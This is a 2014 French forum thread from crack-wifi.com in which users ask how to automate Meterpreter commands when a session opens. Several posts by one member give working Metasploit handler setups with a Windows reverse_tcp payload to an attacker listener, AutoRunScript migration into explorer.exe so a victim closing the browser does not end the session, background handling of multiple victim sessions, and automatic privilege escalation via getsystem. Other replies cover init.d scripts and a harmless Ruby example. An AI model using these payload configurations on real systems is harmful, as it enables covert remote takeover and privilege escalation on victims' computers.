Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-07-2014 17:30:42

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Script qui automatise les commandes meterpreter

Bonjour à tous,

Je crée un nouveau sujet car j'ai un petit problème, j'aimerai faire executer un script en bash qui lui contient des commandes à taper sur meterpreter.

Par exemple, mon script:

#! /bin/bash
getsystem
get privs

J'aimerai le faire executer dès qu'une nouvelle session s'ouvre, avec AutoRunScript peut être?

Merci d'avance !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-07-2014 01:28:24

YAZ
Membre
Inscription : 12-12-2013
Messages : 21

Re : Script qui automatise les commandes meterpreter

Hors Ligne

#3 23-07-2014 11:04:43

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

Merci pour le lien YAZ, mais ça nécessite d'avoir ouvert des sessions au préalable

Alors que j'aimerai que les commandes se tapent dès que la première sessions s'ouvre smile

Hors Ligne

#4 23-07-2014 11:20:24

johny12
Membre Indéboulonnable
Inscription : 08-08-2011
Messages : 119
Site Web

Re : Script qui automatise les commandes meterpreter

Le plus propre est d'ajouter ton script à init.d
Sinon tu peux t'en sortir avec les crontab

Exemple :

cd /etc/init.d/
sudo nano test -> tu y entres ton script et le sauvegarde
sudo chmod 755 /etc/init.d/test 
update-rd.d test defaults

update-rc.d -f test remove -> Si tu veux le dégager du démarrage sans le supprimer 

Dernière modification par johny12 (23-07-2014 11:21:01)


Fondateur de johnyhack.ddns.net, co-admin de machack.fr,  et  dirigeant du défunt mac-hack.forumactif.com

Hors Ligne

#5 23-07-2014 12:33:32

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

Ca m'a l'air pas mal ça Johny12 ! Merci, j'essaierai ça dès que j'ai accès à mon ordi wink

Dans le script j'entre uniquement les commandes a executer?

Hors Ligne

#6 23-07-2014 12:42:00

johny12
Membre Indéboulonnable
Inscription : 08-08-2011
Messages : 119
Site Web

Re : Script qui automatise les commandes meterpreter

Y me semble que tu peux, mais tu as un exemple plus détaillé ici : http://www.debian-administration.org/ar … ith_Debian


Fondateur de johnyhack.ddns.net, co-admin de machack.fr,  et  dirigeant du défunt mac-hack.forumactif.com

Hors Ligne

#7 23-07-2014 12:44:00

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

Interessant, j'essaierai ça ! Merci à toi Johny ! smile

Hors Ligne

#8 23-07-2014 14:01:52

YAZ
Membre
Inscription : 12-12-2013
Messages : 21

Re : Script qui automatise les commandes meterpreter

ah ok pardon,
sinon au cas ou l'autre solution proposee ne te conviendrai pas, il faut effectivement passer par autorunscript,
un exemple ici : https://dev.metasploit.com/redmine/proj … eterpreter
et il me semble que le fichier d'exemple qui n'est plus dispo est celui ci : https://github.com/pwnieexpress/metaspl … scraper.rb
ca sera un peu plus long que les 2 commandes que tu voulais, mais sinon, je ne vois pas comment tu veux faire interpreter a bash des commandes metasploit.

Hors Ligne

#9 27-07-2014 05:17:43

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Script qui automatise les commandes meterpreter

Il existe plusieurs façons d'utiliser AutoRunScript afin d'automatiser certaines actions et ainsi éviter un temps de réaction long de la part de l'attaquant, tu peux par exemple en générant ton payload ajouter ceci:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.59
set LPORT 4321

set AutoRunScript migrate -n explorer.exe
exploit

Ce qui permet au payload une fois exécuté de migrer automatiquement vers le processus explorer.exe qui est généralement utilisé parce que c'est un processus qui tourne en permanence, il représente le bureau (à ne pas confondre avec iexplorer). Le cas par exemple lors d'une attaque d'un navigateur: la victime peut voir une page qui a du mal à s'afficher et le temps que le payload est exécuté puis entame une connexion avec le gestionnaire de Metasploit et que ce dernier affiche le résultat et ensuite commencer à taper pour afficher la liste des processus en mémoire pour pouvoir choisir ensuite celui vers lequel migrer... tu vois il s'écoulera beaucoup de temps qui pendant cette période la victime peut cliquer seulement pour fermer la page ou le navigateur, et tu perds ta session.

L'option -n pour spécifier le processus qu'on souhaite et avec l'option -f meterpreter crée lui même un processus et migre au sein de celui-ci (nodepad.exe). Tu peux aussi ajouter quelques commandes:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.59
set LPORT 4321
set AutoRunScript migrate -n explorer.exe

set exitonsession false
exploit -j -z

Ce qui permet de ne pas interagir avec la session en cour, Metasploit t'indiquera le nombre de sessions ouvertes mais n'ouvre aucune, c'est à toi de choisir il se peut que le même payload est exécuté sur plusieurs machines différentes ou que la victime ait cliqué deux ou trois fois de suite, ou que cette fois-ci plusieurs payload sont configurés avec les mêmes adresses IP et ports et se croisent tous vers un unique gestionnaire. Et pour cela tu rajoutes les options -j et -z à exploit afin de le mettre en background.

Tu noteras que cette solution est limitée, les commandes getsystem et use priv ne sont pas prises en compte sauf migrate, en tout cas pas à ma connaissance. Mais tu peux faire ceci pour automatiser la commande getsystem:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.59
set LPORT 4321

set AutoRunScript post/windows/escalate/getsystem
exploit

Hors Ligne

#10 28-07-2014 19:44:24

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

Super interessant Fuji !

Pour la commande migrate je connaissais mais pas le reste !

C'est dommage que migrate ne prend pas en compte d'autres commandes.. Mais c'est toujours pratique !

Merci à toi ! smile

Hors Ligne

#11 28-07-2014 21:23:06

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

johny12 a écrit :

Le plus propre est d'ajouter ton script à init.d
Sinon tu peux t'en sortir avec les crontab

Exemple :

cd /etc/init.d/
sudo nano test -> tu y entres ton script et le sauvegarde
sudo chmod 755 /etc/init.d/test 
update-rd.d test defaults

update-rc.d -f test remove -> Si tu veux le dégager du démarrage sans le supprimer 

J'ai écrit mon script en bash dans test.sh

J'ai mi cette entête:

### BEGIN INIT INFO
# Provides: skeleton
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Should-Start: $portmap
# Should-Stop: $portmap
# X-Start-Before: nis
# X-Stop-After: nis
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# X-Interactive: true
# Short-Description: Example initscript
# Description: This file should be used to construct scripts to be placed in /etc/init.d.
#
### END INIT INFO

Mais j'ai:

update-rc.d: using dependency based boot sequencing

As-tu une idée ?

Hors Ligne

#12 05-08-2014 19:57:59

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Script qui automatise les commandes meterpreter

Anthonyy59 a écrit :

C'est dommage que migrate ne prend pas en compte d'autres commandes.. Mais c'est toujours pratique !

Ce n'est pas migrate qui ne prend pas en compte d'autres commandes, mais bien AutoRunScript, j'avais testé cela.
Je ne sais pas qui est à l'origine de cette option, l'équipe Metasploit ou un contributeur indépendant, mais son objectif est de ne pas perdre une session et donc c'est logique que c'est la commande migrate qui est seule prise en compte.

Si tu veux vraiment automatiser certaines taches il faudrait mettre un peu la tête dans du Ruby, Metasploit est écrit dans ce langage ainsi que Meterpreter. Ce n'est pas très différent de Python, le problème est de savoir à quoi servent et comment utiliser les méthodes (fonctions) utilisées dans Metasploit dont certaines ont été développées pour répondre à un objectif précis. D'autre part, tous ceux qui écrivent des exploits et ces modules qu'on retrouve dans Metasploit, savent très bien comment l'anatomie et la physiologie les systèmes d'exploitation fonctionnent, à savoir Windows et quels sont les changements opérés entre XP et Vista, etc et par extension Linux, Solaris, Unix, IOS, etc. c'est pas gagné hmm

Par exemple, tu peux écrire ceci dans un fichier avec extension anthonny.rb et tu le mets quelque part avec les scripts Meterpreter, c'est à dire dans  /usr/share/metasploit-framework/scripts/meterpreter/:

print_status("Salut, c'est Anthonny")
print_error("non, je ne suis pas connecté en ce moment")
print_line("je ferai bientôt un tuto")

Quand t'as une session Meterpreter, tu tapes:


meterpreter> run anthonny

[+] Salut, c'est Anthonny
[-] non, je ne suis pas connecté en ce moment
je ferai bientôt un tuto

Après comme je viens de te le dire, il faudrait apprendre les méthodes, etc. dans Ruby tout est objet src >>>>

Dernière modification par Fuji (06-08-2014 18:41:23)

Hors Ligne

#13 06-08-2014 06:43:53

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Script qui automatise les commandes meterpreter

Merci pour cette réponse très complète Fuji ! wink

Je vais essayer de me baser sur les autres script en ruby pour faire le mien alors ! Reste à voir si les fonctions de metasploit ne me gêneront pas trop !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]